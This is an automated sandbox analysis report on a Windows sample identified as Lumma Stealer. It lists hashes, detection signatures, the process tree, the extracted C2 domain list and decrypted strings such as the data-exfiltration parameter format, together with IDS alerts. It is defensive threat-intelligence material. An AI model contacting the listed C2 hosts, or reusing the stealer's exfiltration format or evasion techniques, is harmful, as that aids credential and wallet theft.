Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PASS-1234.exe

Overview

General Information

Sample name:PASS-1234.exe
Analysis ID:1582873
MD5:cf15f3e3576d512cf0696d4035212451
SHA1:b9d2ae2405dbd77d4d6c226589990872319f98ce
SHA256:3114e7c13f6545c7cb73343fbcb4ec4b0648751091d796f7923b17818603fb36
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • PASS-1234.exe (PID: 1916 cmdline: "C:\Users\user\Desktop\PASS-1234.exe" MD5: CF15F3E3576D512CF0696D4035212451)
    • conhost.exe (PID: 4368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 4512 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
    • WerFault.exe (PID: 4776 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 1224 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["noisycuttej.shop", "nearycrepso.shop", "framekgirus.shop", "abruptyopsn.shop", "tirepublicerj.shop", "rabidcowse.shop", "wholersorie.shop", "cloudewahsj.shop", "undesirabkel.click"], "Build id": "LPnhqo--wcyjskajenao"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000003.00000003.2773711720.000000000345D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000003.2725007769.000000000345D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000003.00000003.2773902054.000000000345D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: PASS-1234.exe PID: 1916JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                Click to see the 5 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:39:14.786997+010020283713Unknown Traffic192.168.2.649709188.114.97.3443TCP
                2024-12-31T17:39:46.812877+010020283713Unknown Traffic192.168.2.649898104.21.96.1443TCP
                2024-12-31T17:40:08.343881+010020283713Unknown Traffic192.168.2.649986104.21.96.1443TCP
                2024-12-31T17:40:09.507842+010020283713Unknown Traffic192.168.2.649988104.21.96.1443TCP
                2024-12-31T17:40:10.734503+010020283713Unknown Traffic192.168.2.649989104.21.96.1443TCP
                2024-12-31T17:40:11.944071+010020283713Unknown Traffic192.168.2.649990104.21.96.1443TCP
                2024-12-31T17:40:13.518980+010020283713Unknown Traffic192.168.2.649991104.21.96.1443TCP
                2024-12-31T17:40:16.683127+010020283713Unknown Traffic192.168.2.649992104.21.96.1443TCP
                2024-12-31T17:40:18.160408+010020283713Unknown Traffic192.168.2.649993104.21.96.1443TCP
                2024-12-31T17:40:21.336200+010020283713Unknown Traffic192.168.2.649994104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:39:46.220798+010020546531A Network Trojan was detected192.168.2.649709188.114.97.3443TCP
                2024-12-31T17:40:07.873836+010020546531A Network Trojan was detected192.168.2.649898104.21.96.1443TCP
                2024-12-31T17:40:08.799774+010020546531A Network Trojan was detected192.168.2.649986104.21.96.1443TCP
                2024-12-31T17:40:21.794131+010020546531A Network Trojan was detected192.168.2.649994104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:39:46.220798+010020498361A Network Trojan was detected192.168.2.649709188.114.97.3443TCP
                2024-12-31T17:40:07.873836+010020498361A Network Trojan was detected192.168.2.649898104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:40:08.799774+010020498121A Network Trojan was detected192.168.2.649986104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:39:46.812877+010020585991Domain Observed Used for C2 Detected192.168.2.649898104.21.96.1443TCP
                2024-12-31T17:40:08.343881+010020585991Domain Observed Used for C2 Detected192.168.2.649986104.21.96.1443TCP
                2024-12-31T17:40:09.507842+010020585991Domain Observed Used for C2 Detected192.168.2.649988104.21.96.1443TCP
                2024-12-31T17:40:10.734503+010020585991Domain Observed Used for C2 Detected192.168.2.649989104.21.96.1443TCP
                2024-12-31T17:40:11.944071+010020585991Domain Observed Used for C2 Detected192.168.2.649990104.21.96.1443TCP
                2024-12-31T17:40:13.518980+010020585991Domain Observed Used for C2 Detected192.168.2.649991104.21.96.1443TCP
                2024-12-31T17:40:16.683127+010020585991Domain Observed Used for C2 Detected192.168.2.649992104.21.96.1443TCP
                2024-12-31T17:40:18.160408+010020585991Domain Observed Used for C2 Detected192.168.2.649993104.21.96.1443TCP
                2024-12-31T17:40:21.336200+010020585991Domain Observed Used for C2 Detected192.168.2.649994104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:39:14.786997+010020585511Domain Observed Used for C2 Detected192.168.2.649709188.114.97.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:39:46.331181+010020585981Domain Observed Used for C2 Detected192.168.2.6570161.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:39:46.244581+010020586161Domain Observed Used for C2 Detected192.168.2.6576161.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:39:14.247349+010020585501Domain Observed Used for C2 Detected192.168.2.6503841.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:40:10.010366+010020480941Malware Command and Control Activity Detected192.168.2.649988104.21.96.1443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://abruptyopsn.shop:443/apialAvira URL Cloud: Label: malware
                Source: https://abruptyopsn.shop/api9v9-Avira URL Cloud: Label: malware
                Source: https://abruptyopsn.shop:443/apiffxt.default-release/key4.dbPKAvira URL Cloud: Label: malware
                Source: https://abruptyopsn.shop/apiiAvira URL Cloud: Label: malware
                Source: https://abruptyopsn.shop/4Avira URL Cloud: Label: malware
                Source: https://abruptyopsn.shop/OwAvira URL Cloud: Label: malware
                Source: https://abruptyopsn.shop/NAvira URL Cloud: Label: malware
                Source: https://abruptyopsn.shop/apidAvira URL Cloud: Label: malware
                Source: undesirabkel.clickAvira URL Cloud: Label: malware
                Source: https://abruptyopsn.shop/apiAvira URL Cloud: Label: malware
                Source: https://undesirabkel.click/apiAvira URL Cloud: Label: malware
                Source: https://abruptyopsn.shop/YAvira URL Cloud: Label: malware
                Source: https://abruptyopsn.shop/Avira URL Cloud: Label: malware
                Source: https://abruptyopsn.shop/22hAvira URL Cloud: Label: malware
                Source: https://abruptyopsn.shop/apiNET;Avira URL Cloud: Label: malware
                Source: https://abruptyopsn.shop/gAvira URL Cloud: Label: malware
                Source: https://abruptyopsn.shop/apiBAvira URL Cloud: Label: malware
                Source: https://abruptyopsn.shop/api4Avira URL Cloud: Label: malware
                Source: 3.2.aspnet_regiis.exe.3170000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["noisycuttej.shop", "nearycrepso.shop", "framekgirus.shop", "abruptyopsn.shop", "tirepublicerj.shop", "rabidcowse.shop", "wholersorie.shop", "cloudewahsj.shop", "undesirabkel.click"], "Build id": "LPnhqo--wcyjskajenao"}
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Roaming\gdi32.dllJoe Sandbox ML: detected
                Source: PASS-1234.exeJoe Sandbox ML: detected
                Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
                Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpString decryptor: rabidcowse.shop
                Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpString decryptor: noisycuttej.shop
                Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
                Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpString decryptor: framekgirus.shop
                Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpString decryptor: wholersorie.shop
                Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
                Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpString decryptor: nearycrepso.shop
                Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpString decryptor: undesirabkel.click
                Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpString decryptor: LPnhqo--wcyjskajenao
                Source: PASS-1234.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49898 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49986 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49988 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49989 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49990 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49991 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49992 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49993 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49994 version: TLS 1.2
                Source: PASS-1234.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: \??\C:\Users\user\Desktop\PASS-1234.PDB source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013AF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdba source: WERECA6.tmp.dmp.6.dr
                Source: Binary string: %%.pdb source: PASS-1234.exe, 00000000.00000002.2208350203.0000000000DEA000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: HP^o0C:\Windows\mscorlib.pdb source: PASS-1234.exe, 00000000.00000002.2208350203.0000000000DEA000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013AF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: WERECA6.tmp.dmp.6.dr
                Source: Binary string: mscorlib.pdb Cultu source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013FB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013AF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb5t source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013FB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.ni.pdb source: WERECA6.tmp.dmp.6.dr
                Source: Binary string: \??\C:\Windows\mscorlib.pdb source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013AF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbN source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013FB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.ni.pdbRSDS source: WERECA6.tmp.dmp.6.dr
                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbxi source: PASS-1234.exe, 00000000.00000002.2208701388.0000000001381000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Desktop\PASS-1234.PDB source: PASS-1234.exe, 00000000.00000002.2208350203.0000000000DEA000.00000004.00000010.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_6D393562 FindFirstFileExW,0_2_6D393562
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 4x nop then mov ebx, eax0_2_00BB6860
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 4x nop then mov ebp, eax0_2_00BB6860
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-56F603F1h]0_2_00BED110
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_00BB3A90
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_00BB83F0
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_00BB83F0
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00BC5E50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebx+09h]3_2_0317AB30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+6E7A9B35h]3_2_03196B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+6E7A9B35h]3_2_03196B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+0D4DFAB1h]3_2_031AFA20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax3_2_031AD962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, edx3_2_0317B9B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-54159B5Eh]3_2_0317C9D1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov al, 01h3_2_031AE1E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+edi-4Fh]3_2_031AE043
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx3_2_0317DF42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0319C601
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-56F603E5h]3_2_0319D5B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 6E87DD67h3_2_031ABDD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ebx3_2_031ABDD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [esi+1Ch], edi3_2_0317CDCA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [eax], cl3_2_0317CDCA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_031A5B00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]3_2_03172B90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [ecx], dx3_2_0317DBE5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-56F603F1h]3_2_031AC210
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov esi, eax3_2_031AD25E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_0319AAA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+44h]3_2_0318C11B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [ebp-44h]3_2_03199129
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, eax3_2_03175960
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebp, eax3_2_03175960
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+60h]3_2_031889FD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [esi+edx+02h], 0000h3_2_031909F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+edi-61h]3_2_0318B83D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+04h]3_2_031AC020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]3_2_0318F040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov esi, edx3_2_03199862
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov esi, edx3_2_03199862
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+0D4DFAB1h]3_2_031B00B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [esi], cx3_2_031870CA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+18h]3_2_031870CA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [ebx], ax3_2_0318D0EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax3_2_03185F48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax3_2_03179770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+6A0FF1DCh]3_2_03179770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx3_2_03179770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h3_2_0319AFD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+0Ah]3_2_031957D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, dword ptr [esp+2Ch]3_2_031957D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [esi+0Ch], edx3_2_0317AFC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+edi-72A146CEh]3_2_03193FF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0317A7EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0319C607
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-3DCE6797h]3_2_0318E630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, edi3_2_03197E69
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]3_2_03199E60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [ebx], ax3_2_0318CE98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [ebx], ax3_2_0318CEB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], cl3_2_0319BEA2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [ecx], dx3_2_0318D50B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+0D4DFAB1h]3_2_031AFD30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then test eax, eax3_2_031A9520
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then add ecx, 02h3_2_031A9520
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then push eax3_2_031A9520
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-56F603FDh]3_2_031AC540
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-3394892Fh]3_2_0318958C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx3_2_03198DA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp dword ptr [031B7A3Ch]3_2_03198DA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0319E5EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [ebp-44h]3_2_03199129
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 385488F2h3_2_031964D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_2_031774F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_031774F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx3_2_031AE4E1

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2058550 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (undesirabkel .click) : 192.168.2.6:50384 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.6:49709 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2058598 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abruptyopsn .shop) : 192.168.2.6:57016 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058616 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nearycrepso .shop) : 192.168.2.6:57616 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058599 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI) : 192.168.2.6:49898 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2058599 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI) : 192.168.2.6:49986 -> 104.21.96.1:443
